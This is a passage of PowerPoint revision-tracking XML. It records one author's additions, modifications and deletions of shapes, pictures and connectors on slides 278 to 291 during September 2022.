        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:09:25.052" v="4422" actId="13926"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3328257088" sldId="278"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T08:17:45.542" v="2414" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278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08:23.865" v="1956" actId="1032"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="27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08:17:48.266" v="2417"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278"/>
            <ac:spMk id="6" creationId="{C20AFD86-88C3-91AA-C09E-44CDA3F5900D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7" creationId="{6AB2D6B8-ED3B-BAC9-A66A-0B4BF393AC30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9" creationId="{55FE06FE-A771-ED6B-8868-BB56E3E2C22E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:09:25.052" v="4422" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278"/>
            <ac:spMk id="11" creationId="{4372FC8D-9108-435A-1521-2D1456F82507}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T08:32:19.353" v="2868" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278"/>
            <ac:spMk id="17" creationId="{5F409A5E-C2BC-C1EC-3ACD-B1C8C04CD243}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T08:32:55.507" v="2974" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278"/>
            <ac:spMk id="19" creationId="{1E8CD8DC-E6F8-CE2B-4F1B-9F795E14C697}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T08:33:44.994" v="3093" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278"/>
            <ac:spMk id="21" creationId="{994A5F0B-57F8-A0E0-4BCE-5F1B090B86FA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T08:35:31.706" v="3275" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278"/>
            <ac:spMk id="23" creationId="{D6DDCF60-C258-F6FF-9AC4-D0FECF2C02FA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T08:30:31.547" v="2806" actId="1076"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278"/>
            <ac:graphicFrameMk id="5" creationId="{6ECCA2D6-DA15-B0BC-2C67-09F1C089C114}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T08:34:38.286" v="3148" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278"/>
            <ac:cxnSpMk id="13" creationId="{ECB6D6FB-D6E7-8EED-8282-6972E8C8CCB9}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T08:34:46.023" v="3150" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278"/>
            <ac:cxnSpMk id="14" creationId="{089856C0-940C-3A95-36B1-126CD067C533}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T08:34:54.271" v="3152" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278"/>
            <ac:cxnSpMk id="15" creationId="{13278C0F-2901-CD7D-0FEF-3D5D04B81CEB}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T08:40:35.569" v="3747" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4291775708" sldId="279"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T08:36:34.898" v="3292" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4291775708" sldId="27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08:40:35.569" v="3747" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4291775708" sldId="279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1:14:56.691" v="4434" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1997460661" sldId="280"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:08:34.673" v="4418" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1997460661" sldId="280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08:39.968" v="4420" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1997460661" sldId="280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08:38.007" v="4419" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1997460661" sldId="280"/>
            <ac:spMk id="6" creationId="{C8A40C82-E281-33FA-27C9-49DD4B8BC6D0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:08:41.549" v="4421" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1997460661" sldId="280"/>
            <ac:spMk id="8" creationId="{D7CAC900-0A17-AAED-9AFC-B663136B1BCF}"/>
          </ac:spMkLst>
        </pc:sp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6" creationId="{BDEC6C50-ACCB-1F50-E162-1CCB77D4E463}"/>
          </ac:picMkLst>
        </pc:pic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8" creationId="{8C0EBB85-EDDA-C9CB-D568-8B3167875660}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T13:45:24.430" v="11112" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3497835920" sldId="281"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:24:47.250" v="4838" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3497835920" sldId="28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45:24.430" v="11112" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3497835920" sldId="281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11:31:56.657" v="5405" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3497835920" sldId="281"/>
            <ac:picMk id="6" creationId="{76AAFA0D-3B45-1F2C-C284-75540A5DA68C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:28:50.566" v="5343" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2497861930" sldId="282"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:28:50.566" v="5343" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2497861930" sldId="282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52:46.669" v="6332" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3961461186" sldId="283"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:49:35.594" v="6095" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3961461186" sldId="28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2:46.669" v="6332" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3961461186" sldId="283"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:28:23.786" v="7249" actId="208"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="730388274" sldId="284"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:58:04.345" v="6566" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="73038827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06:17.651" v="6802" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="730388274" sldId="284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12:16:17.764" v="6996" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="730388274" sldId="284"/>
            <ac:spMk id="14" creationId="{37FF5A66-C9BF-D01A-ADA7-CE5F407CFBBF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:01:46.442" v="6728" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="730388274" sldId="284"/>
            <ac:picMk id="6" creationId="{9337A5B9-5FF9-5FF9-4713-F3810DB7B415}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:28:23.786" v="7249" actId="208"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="730388274" sldId="284"/>
            <ac:picMk id="8" creationId="{CC965B87-D179-AE85-E110-B9B06BD8A836}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:06:23.850" v="6803" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="730388274" sldId="284"/>
            <ac:cxnSpMk id="10" creationId="{C0E29E3D-9CEF-CBAB-D840-B7F3B5D372CE}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:06:32.320" v="6806" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="730388274" sldId="284"/>
            <ac:cxnSpMk id="12" creationId="{38E885A1-4C42-582C-2250-57668BBEEE93}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:57:51.913" v="6534" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4035199684" sldId="284"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:55:44.216" v="6467" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="403519968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3:39.468" v="6439" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4035199684" sldId="28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13:42.339" v="6977" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1711768464" sldId="285"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:13:42.339" v="6977" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1711768464" sldId="285"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:13:26.177" v="6951" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3353301268" sldId="285"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:09:38.261" v="6945" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3353301268" sldId="285"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:57:48.793" v="6533" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4170420308" sldId="285"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T11:56:36.443" v="6488" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4170420308" sldId="285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57:06.018" v="6489" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4170420308" sldId="285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57:07.378" v="6490" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4170420308" sldId="285"/>
            <ac:spMk id="6" creationId="{7F10A11E-F80B-E587-B686-53FBD869445D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9:59.376" v="12189" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4175268356" sldId="286"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:14:25.606" v="6980" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4175268356" sldId="28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14:30.240" v="6981" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4175268356" sldId="286"/>
            <ac:spMk id="6" creationId="{581B375C-7CFC-0B2B-12C0-151A8557CDA6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T21:39:59.376" v="12189" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4175268356" sldId="286"/>
            <ac:spMk id="12" creationId="{B168E61E-8F87-14E8-918E-3593C2C59FCF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:14:30.914" v="6982" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4175268356" sldId="286"/>
            <ac:spMk id="14" creationId="{37FF5A66-C9BF-D01A-ADA7-CE5F407CFBBF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T21:39:50.454" v="12187" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4175268356" sldId="286"/>
            <ac:spMk id="15" creationId="{A0720214-F442-D417-594B-D1B81F3289CA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T21:39:53.736" v="12188" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4175268356" sldId="286"/>
            <ac:spMk id="17" creationId="{D776E447-D70A-D204-0DD0-C6890B29AA67}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:14:23.754" v="6979" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4175268356" sldId="286"/>
            <ac:picMk id="8" creationId="{CC965B87-D179-AE85-E110-B9B06BD8A836}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod ord modCrop">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T21:38:17.207" v="12183" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4175268356" sldId="286"/>
            <ac:picMk id="9" creationId="{9E4406B4-D716-37B8-D760-DF048810FCC3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:14:31.698" v="6983" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4175268356" sldId="286"/>
            <ac:cxnSpMk id="10" creationId="{C0E29E3D-9CEF-CBAB-D840-B7F3B5D372CE}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:20:24.822" v="7012"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2228773333" sldId="287"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:56:29.899" v="9804" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3620112234" sldId="287"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:20:37.833" v="7054" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3620112234" sldId="28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6:29.899" v="9804" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3620112234" sldId="287"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:28:31.933" v="7250" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3620112234" sldId="287"/>
            <ac:picMk id="6" creationId="{D3530D46-11DD-A35D-15D2-8E806E003ED0}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:31:26.109" v="7262" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1964098297" sldId="288"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:27:31.901" v="7236" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1964098297" sldId="28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27:33.410" v="7237" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1964098297" sldId="288"/>
            <ac:spMk id="7" creationId="{225C51E8-4A84-BCF4-2A4E-94E933EA452D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="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6" creationId="{D3530D46-11DD-A35D-15D2-8E806E003ED0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add 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9" creationId="{70F3E242-8AFC-FF1F-E8C5-1010AD50F559}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T13:14:42.966" v="10727" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="393640102" sldId="289"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:35:45.302" v="7477" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="393640102" sldId="28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14:37.604" v="10726" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="393640102" sldId="289"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T13:14:42.966" v="10727" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="393640102" sldId="289"/>
            <ac:picMk id="2050" creationId="{780E8F4C-1672-4E32-2A45-9C0032040AA4}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:33:35.102" v="7334" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4134544221" sldId="289"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod setBg">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:46:02.786" v="8712" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1539343521" sldId="290"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:36:51.181" v="7515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46:02.786" v="8712" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1539343521" sldId="290"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:36:36.007" v="7483" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1539343521" sldId="290"/>
            <ac:grpSpMk id="5" creationId="{BF50D918-EF5A-2C1A-28B4-7E81D667330D}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="ord">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:44:30.165" v="8613" actId="167"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1539343521" sldId="290"/>
            <ac:picMk id="24" creationId="{AEF942E7-0B62-B105-D39A-BEC25F11B6C3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod setBg">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{55E03720-A2BA-4F58-BD92-56A302C21D06}" dt="2022-09-05T12:51:37.218" v="9649" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2048451075" sldId="291"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
